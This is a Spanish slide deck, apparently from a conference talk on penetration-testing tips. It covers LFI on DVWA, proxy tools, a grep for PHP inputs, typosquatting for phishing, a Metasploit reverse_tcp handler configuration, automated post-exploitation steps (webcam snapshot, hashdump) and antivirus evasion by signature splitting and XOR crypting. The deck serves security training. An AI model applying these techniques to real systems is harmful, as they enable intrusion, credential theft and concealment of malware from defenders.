A veces la diferencia entre poder acceder a un sistema remoto con éxito o fallar puede ser el conocimiento de una herramienta, una línea de comando o incluso una técnica de evasión de AV/Firewall. Esta plática brindará consejos y trucos para poder hackear "like a Boss", que le dará una ventaja durante la auditoría de un sistema
Ponente: Roberto Salgado. Director técnico y co-fundador de Websec México. Roberto ha participado y contribuido en proyectos importantes como ModSecurity, PHPIDS, sqlmap y el libro “Web Application Obfuscation“. Creó la base de conocimientos de inyección SQL, una de las referencias más completas disponibles en la web y Panoptic, un buscador de rutas de archivos comunes con vulnerabilidades tipo LFI. También desarrollo el método más rápido para extraer información de bases de datos vulnerables a inyección a ciegas.
3. Roberto Salgado
• Co-founder of Websec
• Provide information security solutions
• Pen-testing, training and monitoring
• Pythonista / Security Researcher
Contacto
• rsalgado@websec.mx
• http://www.websec.mx
• http://www.twitter.com/@LightOS
• http://www.github.com/lightos
4. TEMARIO
• DVWA
• Herramientas para el browser
• Buscar otras entradas de ataque
• Encontrar vulns con auditoria de código
• Phishing
• Evasión de AV
• Evasión de Firewall
5. PENTEST VS AUDITORIA DE
VULNERABILIDADES
• En la auditoría de vulnerabilidades se listan todas las
vulnerabilidades encontradas.
• En la prueba de penetración solo se listan las vulnerabilidades
que se utilizaron para obtener acceso a la información,
haciendo énfasis en el impacto de la explotación y no en la
totalidad de las vulnerabilidades.
6. DAMN VULNERABLE WEB APPLICATION
DVWA es una aplicación web vulnerable a:
• Brute Force
• Command Execution
• Insecure Captcha
• File Inclusion
• SQLi
• SQLi Blind
• Upload
• XSS Reflected
• XSS Stored
7. LOCAL FILE INCLUSION
• LFI es una vulnerabilidad que nos permite leer archivos en un
sistema
• DEMO - http://localhost/lfi.php?file
10. LOCAL FILE INCLUSION
• RCE No es posible?
• En ese caso tenemos que buscar archivos confidenciales
manualmente
• Buscar archivos de configuración o bitácoras para elevar
nuestro acceso
12. TOOLS / LFI / PANOPTIC
• Filtrar búsqueda por Sistema Operativo, tipo de archivo (conf o
log), software, etc…
• Opción para guardar los archivos encontrados y quitar el HTML
del archivo
• Soporta hilos, proxy HTML y socks 4/5, user-agent al azar,
etc…
14. TOOLS / PROXY / FIREFOX
• Tamper Data
• Hack Bar
• Burp Suite Pro
15. TOOLS / PROXY / FIREFOX
• Tamper Data --- DEMO
• Hack Bar --- DEMO
• Burp Suite Pro
16. TOOLS / PROXY / CHROME
• Chrome Developer Tools (Ctrl+Shift+I o F12)
• API limitado == No hay equivalente a tamper data
• Burp Suite Pro al rescate!
30. DNS LOOKUP
• Ataque de diccionario
• Ataque de fuerza bruta (brute force)
• Transferencia de zona
• SOA (Start of Authority) a través de DNS mal configurado
39. BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
40. BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
41. BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
• Nombre de archivo
42. BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
• Nombre de archivo
• Numero de línea
43. BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
• Nombre de archivo
• Numero de línea
44. BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
• Nombre de archivo
• Numero de línea
• Dos líneas atrás
45. BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
• Nombre de archivo
• Numero de línea
• Dos líneas atrás
• Dos líneas adelante
46. BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
• Nombre de archivo
• Numero de línea
• Dos líneas atrás
• Dos líneas adelante
• Mayúsculas y minúsculas
47. BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
• Nombre de archivo
• Numero de línea
• Dos líneas atrás
• Dos líneas adelante
• Mayúsculas y minúsculas
• Buscar GET o POST
48. BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
• Nombre de archivo
• Numero de línea
• Dos líneas atrás
• Dos líneas adelante
• Mayúsculas y minúsculas
• Buscar GET o POST
• En el directorio actual
49. BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
• Nombre de archivo
• Numero de línea
• Dos líneas atrás
• Dos líneas adelante
• Mayúsculas y minúsculas
• Buscar GET o POST
• En el directorio actual
• Guardar los resultados a vulns.txt
58. PHISHING / TLD INCORRECTO
• Registran .com.mx pero no .com
• .net, .org, .co, .ca, .mx
• www.campus-party.com.mx - Existe
• www.campus-party.net – No existe
• www.campus-party.com – En venta
59. DOMAIN SQUATTING / BIT SQUATTING
• Rayos cósmicos
• Se sobrecalienta el dispositivo
• Pasa unas 600,000 veces al día
Herramienta:
• URLCRAZY
60.
61. MSF AUTOPWNAGE
• Captura de pantalla (screenshot)
• Foto de la Webcam (webcam_snap)
• Información del sistema (sysinfo)
• Obtención de la IP (ipconfig)
• Routing de la red (route)
• Carpeta actual (pwd)
• Listar archivos (ls)
• Dumpear claves (run hashdump)
• Cierra la sesión
62. use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
set ExitOnSession false
spool C:UsersLightOSDesktopmsf-output.log
exploit -j
67. EVASIÓN DE ANTIVIRUS / DSPLIT
• Incrementalmente dividimos el archivo en bytes
• Escaneamos cada archivo generado
• Volvemos a dividir el archivo que es detectado y uno después
• Repetimos el proceso hasta que nos quede 1 byte de diferencia
• Modificamos el byte para cambiar la firma y evadir detección
69. EVASIÓN DE ANTIVIRUS / CRYPTER XOR
• Herramienta en Python que usa en template en C
• Hace XOR con un random byte y le agrega padding para
cambiar el tamaño
• Carga el shellcode y hace la operación XOR al correr
71. EVASION DE FIREWALL
• HTML 5 Security CheatSheet
• http://html5sec.org
• Base de Conocimientos de Inyecciones SQL
• http://www.websec.ca/kb/sql_injection